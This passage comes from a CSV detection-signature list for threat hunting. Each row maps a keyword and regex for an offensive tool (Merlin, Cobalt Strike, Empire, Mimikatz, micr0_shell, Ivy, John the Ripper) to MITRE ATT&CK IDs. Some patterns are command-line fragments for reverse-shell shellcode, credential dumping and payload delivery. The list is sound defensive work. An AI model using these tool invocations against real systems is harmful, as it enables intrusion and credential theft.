TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Dump.ps1*",".{0,1000}\sInvoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Invoke-ExcelMacroPivot.ps1*",".{0,1000}\sInvoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-InternalMonologue.ps1*",".{0,1000}\sInvoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Mimikatz.ps1*",".{0,1000}\sInvoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-PowerThIEf.ps1*",".{0,1000}\sInvoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Stealth.ps1*",".{0,1000}\sInvoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* Invoke-WMILM.ps1*",".{0,1000}\sInvoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --ip * --port * --type cmd --language *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-type\scmd\s\-\-language\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* -ip * -smb2support *lwpshare* ",".{0,1000}\s\-ip\s.{0,1000}\s\-smb2support\s.{0,1000}lwpshare.{0,1000}\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -IP * -SpooferIP * -HTTP N*",".{0,1000}\s\-IP\s.{0,1000}\s\-SpooferIP\s.{0,1000}\s\-HTTP\sN.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* --ip * --variable shellcode *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-variable\sshellcode\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* ip-forwarding.nse*",".{0,1000}\sip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-geoplugin.nse*",".{0,1000}\sip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-ipinfodb.nse*",".{0,1000}\sip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-bing.nse*",".{0,1000}\sip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-google.nse*",".{0,1000}\sip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-kml.nse*",".{0,1000}\sip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-maxmind.nse*",".{0,1000}\sip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-https-discover.nse*",".{0,1000}\sip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipidseq.nse*",".{0,1000}\sipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-brute.nse*",".{0,1000}\sipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-cipher-zero.nse*",".{0,1000}\sipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-version.nse*",".{0,1000}\sipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* IPV6 addresses xored *",".{0,1000}\sIPV6\saddresses\sxored\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* ipv6-multicast-mld-list.nse*",".{0,1000}\sipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipv6-node-info.nse*",".{0,1000}\sipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipv6-ra-flood.nse*",".{0,1000}\sipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-botnet-channels.nse*",".{0,1000}\sirc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-brute.nse*",".{0,1000}\sirc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-info.nse*",".{0,1000}\sirc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-sasl-brute.nse*",".{0,1000}\sirc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-unrealircd-backdoor.nse*",".{0,1000}\sirc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -isbeacon *",".{0,1000}\s\-isbeacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* iscsi-brute.nse*",".{0,1000}\siscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iscsi-info.nse*",".{0,1000}\siscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* isns-info.nse*",".{0,1000}\sisns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --isroca --publickey *",".{0,1000}\s\-\-isroca\s\-\-publickey\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -it bloodhound*",".{0,1000}\s\-it\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.png\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.hta\s\-url\shttp\:.{0,1000}\s\-delivery\shta\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js\s\-url\shttp.{0,1000}\s\-delivery\sbits\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.txt\s\-url\shttp.{0,1000}\s\-delivery\smacro\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.xsl\s\-url\shttp.{0,1000}\s\-delivery\sxsl\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.c -Ix86 *.c -P Local -O *.js*",".{0,1000}\s\-Ix64\s.{0,1000}\.c\s\-Ix86\s.{0,1000}\.c\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.vba -Ix86 *.vba -P Inject -O *",".{0,1000}\s\-Ix64\s.{0,1000}\.vba\s\-Ix86\s.{0,1000}\.vba\s\-P\sInject\s\-O\s.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -jar ysoserial.jar*",".{0,1000}\s\-jar\sysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* jdwp-exec.nse*",".{0,1000}\sjdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-info.nse*",".{0,1000}\sjdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-inject.nse*",".{0,1000}\sjdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-version.nse*",".{0,1000}\sjdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -JMXConsole -AppName *",".{0,1000}\s\-JMXConsole\s\-AppName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* john_done*",".{0,1000}\sjohn_done.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_fork*",".{0,1000}\sjohn_fork.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load*",".{0,1000}\sjohn_load.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load_conf*",".{0,1000}\sjohn_load_conf.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load_conf_db*",".{0,1000}\sjohn_load_conf_db.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_log_format*",".{0,1000}\sjohn_log_format.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 